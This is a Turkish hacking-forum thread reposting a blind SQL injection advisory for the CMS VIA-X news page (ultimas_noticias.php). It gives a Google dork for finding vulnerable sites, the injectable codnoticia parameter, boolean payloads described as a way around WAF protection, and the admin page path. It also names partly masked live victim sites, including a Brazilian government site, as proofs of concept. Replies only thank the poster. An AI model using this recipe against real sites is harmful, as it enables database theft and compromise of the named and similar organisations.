Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
CMS VIA-X SQL Injection
#1
Blind Sql Injection on CMS VIA-X
Date: 23/07/2014
CWE Number : CWE-89
Risk: High
Author: Felipe Andrian Peixoto
Vendor Homepage: http://www.viax.com.br/
Contact: felipe_andrian@hotmail.com
Tested on: Windows 7 and Linux
Vulnerable File: ultimas_noticias.php
Dork : inurl:ultimas_noticias.php?codnoticia=

Kod:
Exploit : http://host/ultimas_noticias.php?codnoticia=[BLIND SQL Injection]

ps:use "1'+and+1=2--+" and "1'+and+1=1--+" to bypass the waf protection.

[+] PoC: http://www.caXmaramuritiba.ba.gov.br/ult...noticia=37
http://www.vanXdelson.com.br/ultimas_not...noticia=53
http://www.faXt.edu.br/ultimas_noticias....oticia=797


[+] Admin Page: http://host/admin/
Beğenenler:
#2
Ellerine sağlık exciting
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:
#3
eline saglık
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#4
Eline sağlık.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  創意細胞 SQL Injection H4Sec 27 750 10-03-2016, Saat: 18:37
Son Yorum: byhacı
  Israelian CMS Blind SQL Injection Vulnerability H4Sec 16 1,108 01-03-2016, Saat: 03:59
Son Yorum: Zany
  Joomla Nice Ajax Poll 1.4.0 SQL Injection ERTUĞRUL 0 123 12-12-2015, Saat: 03:08
Son Yorum: ERTUĞRUL
  Grow-Easy CMS SQL Injection Vulnerability Stallk3r 7 459 16-08-2015, Saat: 04:28
Son Yorum: comertcimen
  Medical Website Design SQL Injection Vulnerability Stallk3r 9 646 05-08-2015, Saat: 13:43
Son Yorum: mavisimsek
Anahtar Kelimeler

CMS VIA-X SQL Injection indir, CMS VIA-X SQL Injection Videosu, CMS VIA-X SQL Injection Online izle, CMS VIA-X SQL Injection Bedava indir, CMS VIA-X SQL Injection Yükle, CMS VIA-X SQL Injection Hakkında, CMS VIA-X SQL Injection Nedir, CMS VIA-X SQL Injection Free indir, CMS VIA-X SQL Injection Oyunu, CMS VIA-X SQL Injection Download


1 Ziyaretçi